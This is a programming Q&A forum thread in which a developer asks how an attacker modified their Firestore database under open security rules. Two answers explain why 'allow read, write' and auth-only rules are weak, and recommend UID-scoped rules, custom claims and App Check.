skip to Main Content

I have a small web-based Flutter application that uses Firebase/Firestore. The security rules are allow read, write;

I got an anonymous email from a (friendly) hacker stating that

  • "Our Firebase database credentials are leaked in response to a request" (??)
  • "He was able to modify the database" (which he did indeed)

I understand that I have virtually no security with the given rules but can somebody explain how a hacker can get access to the database and modify it? I guess the starting point is the network requests that can be seen in the browsers developer console but I have no clue what’s next. Can somebody outline how one can modify the Firestore database?

In an attempt to improve this, I have added anonymous authentication to my project and modified the security rules to allow read, write: if request.auth != null;
Does this make hacking attempts (a bit) less easy?

2

Answers


  1. With the allow read, write; security rules, as soon as someone has the API Key of your Firebase Project (which is public and can easily be found in the code of your app) he can read and write to your database, for example by using the Cloud Firestore API.

    Modifying your security rules to allow read, write: if request.auth != null; is not necessarily a solution: If the email/password sign-in method is enabled in your Project, one can use the Firebase Auth REST API and sign-up to your project (i.e. create a new account). Once the user is signed-in the request.auth != null expression becomes true.

    One classical approach to avoid "non-desired" users to access data, is to add one or more Custom Claims to the desired accounts and use these claims in the Security Rules: See the doc for more details.

    Login or Signup to reply.
  2. The security rules are allow read, write;

    If you’re using these settings it means that you allow anybody who knows your project ID to read/write to/from your database. Which is obviously bad, since malicious users can take advantage of it. It’s true that you can use these settings for a small amount of time for testing purposes, but never in a production environment.

    The most important part when it comes to security rules is Firebase Authentication, meaning that you can allow access only to the users that are authenticated to perform operations in your database.

    In an attempt to improve this, I have added anonymous authentication to my project and modified the security rules to allow read, write: if request.auth != null;

    These rules are better than the previous ones. However, it will allow anybody who knows your project ID and is authenticated to read/write to/from your database. If you want a more granular set of security rules, then you can use:

    rules_version = '2';
    service cloud.firestore {
      match /databases/{database}/documents {
        match /users/{uid} {
          allow create: if request.auth != null;
          allow read, update, delete: if request.auth != null && request.auth.uid == uid;
        }
      }
    }
    

    This will allow only the authenticated users to create a document, but to read, update and delete only the ones who have the UID from the authentication the same as the one in the database.

    Besides security rules, I also recommend you use Firebase App Check, which is an additional layer of security that can help you protect access to your Firebase services by attesting that incoming requests are coming from your app. On the other is blocking the traffic that doesn’t have valid credentials.

    So it’s a mix of solutions.

    Login or Signup to reply.
Please signup or login to give your own answer.
Back To Top
Search